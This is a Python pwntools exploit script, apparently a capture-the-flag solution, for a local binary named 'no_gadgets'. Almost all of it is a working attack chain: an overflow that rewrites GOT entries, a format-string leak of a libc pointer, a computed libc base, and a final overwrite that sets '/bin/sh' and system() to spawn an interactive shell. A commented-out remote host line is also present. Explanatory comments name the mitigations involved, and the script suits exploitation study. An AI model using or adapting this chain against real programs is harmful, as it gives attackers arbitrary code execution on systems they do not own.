from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack

# Process handle set by run(); kept module-global so it survives after run() returns.
p = None


def run() -> None:
    """Drive a local './no_gadgets' process through three scripted sends.

    Sequence as written: pause for a debugger, answer the ``Data:`` prompt
    with an oversized buffer, send a second buffer that the author's
    comments describe as replacement GOT contents, read back a leaked
    pointer and derive ``libc.address`` from it, send ``/bin/sh`` plus the
    address of ``system``, then hand the tube to the user.

    Side effects: rebinds the module-global ``p``, spawns a child process,
    prints the computed libc base. Only the local ``process`` path is
    active; the ``remote(...)`` alternative is commented out.

    Note for readers: the GOT-rewrite step below presupposes a writable GOT
    (no full RELRO) and fixed, non-PIE code addresses; full RELRO and PIE
    are the build-time mitigations that remove those preconditions.
    """
    global p
    chall = './no_gadgets'
    context.binary = chall
    # context.log_level = 'debug'
    p = process(chall)
    # p = remote("94.237.56.30", "41910")
    elf = ELF(chall)
    rop = ROP(elf)  # not referenced below
    libc = ELF('./libc.so.6')
    pause()  # blocks until the user continues; gives time to attach a debugger
    RBP = p64(0x00401216 + 0x80)  # not referenced below
    # First buffer: 0x80 filler bytes, then three qwords. The first is the
    # address of got.puts + 0x80; the other two are hard-coded addresses in
    # the binary (not symbolic, so they break if the binary is rebuilt).
    payload = b''
    payload += b'\x00'*0x80
    payload += p64(elf.got['puts'] + 0x80) + p64(0x401275) + p64(0x40121b)
    p.sendlineafter(b"Data: ", payload)
    # Second buffer: per the author's comment it is laid out as the new
    # contents of the GOT starting at got.puts. The format string goes in
    # the puts slot; the following slots are rewritten so the lazy PLT
    # resolver repopulates them. The +0x6 offsets presumably skip the first
    # jmp of each PLT stub so the resolver path is taken -- verify against
    # the disassembly rather than trusting the constant.
    payload = b'%p%p%p%p' # got.puts
    # Then we repopulate all got entries by plt resolver
    payload += p64(0x0000000000401211) # got.strlen -> call printf (hard-coded address)
    payload += p64(elf.plt['printf'] + 0x6) # got.printf
    payload += p64(elf.plt['fgets'] + 0x6) # got.fgets
    payload += p64(elf.plt['setvbuf'] + 0x6) # got.setvbuf
    payload += p64(elf.plt['exit'] + 0x6) # got.exit
    # A newline would end a line-oriented read early. NOTE: assert is
    # stripped under `python -O`; an explicit raise would survive that.
    assert b'\x0a' not in payload, 'Wrong char in payload'
    p.sendline(payload)
    p.recvuntil(b'scratch!\n')
    # Fixed-width parse: characters 2..14 of the next 64 bytes are read as
    # hex. This assumes the first %p output begins with '0x' and is exactly
    # 12 hex digits -- fragile; TODO confirm against actual output.
    leak = int(p.recv(64)[2:14], 16)
    # 0x219b23 is the distance of the leaked pointer from libc base for the
    # shipped ./libc.so.6; it is a magic constant tied to that exact build.
    libc_base = leak - 0x219b23
    libc.address = libc_base
    print(f'LIBC_BASE = {hex(libc_base)}')
    # Third buffer, same GOT layout: '/bin/sh' in the puts slot, system()'s
    # address in the printf slot (the author notes strlen uses the same slot).
    payload = b'/bin/sh\x00' # got.puts
    payload += p64(libc.symbols['system']) # got.printf and also strlen
    p.sendline(payload)
    p.interactive()


if __name__ == "__main__":
    run()